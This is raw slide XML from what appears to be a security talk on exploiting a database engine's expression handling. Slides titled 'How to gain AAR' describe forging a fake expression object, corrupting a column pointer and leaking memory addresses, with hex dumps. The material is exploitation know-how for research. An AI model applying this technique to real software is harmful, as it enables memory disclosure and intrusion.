        <p:nvCxnSpPr>
          <p:cNvPr id="67" name="Curved Connector 66"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="45" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="6124575" y="2874636"/>
            <a:ext cx="1186742" cy="240141"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector4">
            <a:avLst>
              <a:gd name="adj1" fmla="val 42220"/>
              <a:gd name="adj2" fmla="val 195194"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="22225">
            <a:tailEnd type="triangle" w="lg" len="med"/>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1930400" y="134602"/>
            <a:ext cx="8636001" cy="56658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Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="564808" y="4487907"/>
            <a:ext cx="9157690" cy="2230137"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CREATE TABLE TABLE_NAME (col1 DEFAULT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>default_value</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3422089273"/>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94070" y="656834"/>
            <a:ext cx="3645258" cy="1293741"/>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TextBox 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7453928" y="407452"/>
            <a:ext cx="1068309" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx1">
              <a:lumMod val="75000"/>
              <a:lumOff val="25000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="95000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Table</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="95000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="6" name="Straight Connector 5"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7694070" y="1091591"/>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7764853" y="684542"/>
            <a:ext cx="3491345" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>“Table 1”</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="8" name="Straight Connector 7"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7694070" y="1511846"/>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764854" y="1107103"/>
            <a:ext cx="3491345" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>Column *</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7755616" y="1546545"/>
            <a:ext cx="3491345" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>……</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Rectangle 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7694070" y="2449339"/>
            <a:ext cx="3645258" cy="1293741"/>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TextBox 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7453929" y="2199957"/>
            <a:ext cx="1068308" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx1">
              <a:lumMod val="75000"/>
              <a:lumOff val="25000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="95000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Column</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="95000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="13" name="Straight Connector 12"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7694070" y="2884096"/>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764853" y="2477047"/>
            <a:ext cx="3491345" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>“Column 1”</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="15" name="Straight Connector 14"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7694070" y="3304351"/>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764854" y="2899608"/>
            <a:ext cx="3491345" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Fake Expr Object *</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="TextBox 16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7755616" y="3339050"/>
            <a:ext cx="3491345" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>……</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44" name="Rectangle 43"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7694070" y="4247116"/>
            <a:ext cx="3645258" cy="204604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TextBox 44"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7453929" y="3997733"/>
            <a:ext cx="1068308" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx1">
              <a:lumMod val="75000"/>
              <a:lumOff val="25000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="95000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Expr</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="95000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="46" name="Straight Connector 45"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7694070" y="4681872"/>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7764853" y="4274823"/>
            <a:ext cx="3491345" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OP_String</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="48" name="Straight Connector 47"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7694070" y="5102127"/>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7764854" y="4697384"/>
            <a:ext cx="3491345" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="50" name="TextBox 49"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7755616" y="5136826"/>
            <a:ext cx="3491345" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>EP_TokenOnly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>EP_Static</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>EP_Leaf</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="57" name="Straight Connector 56"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7694070" y="5831343"/>
            <a:ext cx="3645258" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="19050">
            <a:solidFill>
              <a:srgbClr val="41719C"/>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7755613" y="5866505"/>
            <a:ext cx="3491345" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Address we want to leak</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="60" name="Curved Connector 59"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="2" idx="1"/>
            <a:endCxn id="12" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="7453930" y="1303705"/>
            <a:ext cx="240141" cy="1080918"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 195194"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="22225">
            <a:tailEnd type="triangle" w="lg" len="med"/>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7127545" y="302556"/>
            <a:ext cx="4285673" cy="60722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 name="Curved Connector 4"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="11" idx="1"/>
            <a:endCxn id="45" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="7453930" y="3096209"/>
            <a:ext cx="240141" cy="1086189"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 195194"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="22225">
            <a:tailEnd type="triangle" w="lg" len="med"/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="accent1"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="accent1"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="accent1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="203712" y="365125"/>
            <a:ext cx="10515600" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>How to gain AAR</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="241040" y="1614196"/>
            <a:ext cx="6592873" cy="5107449"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>Gain AAR with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>fake expression tree</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>No UTF8 conversion</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3470615453"/>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3075783"/>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3046988"/>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FFC000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00 40 54 A4 C3 21 00 00</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 00 00 00 00 00 00 00 00</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="00B0F0"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRP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chemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>10 21 54 A4 C3 21 00 00 00 00 00 00 00 00 00 00</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="00B0F0"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRP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a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>A0 24 54 A4 C3 21 00 00 00 00 00 00 00 00 00 00</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="00B0F0"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRP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a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR"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3113892"/>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4" name="Rectangle 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5513527" y="1753004"/>
            <a:ext cx="5311490" cy="454487"/>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511942" y="2248837"/>
            <a:ext cx="5311490" cy="454487"/>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TextBox 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3284356" y="1795581"/>
            <a:ext cx="1620153" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>104</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" baseline="30000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>th</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Column</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="7" name="Straight Arrow Connector 6"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="2" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4904509" y="1976582"/>
            <a:ext cx="562839" cy="366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3284355" y="2291414"/>
            <a:ext cx="1620153" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>105</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" baseline="30000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>th</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Column</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="18" name="Straight Arrow Connector 17"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4904507" y="2486419"/>
            <a:ext cx="562839" cy="366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743200" y="572556"/>
            <a:ext cx="2161308" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Column to corrupt</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
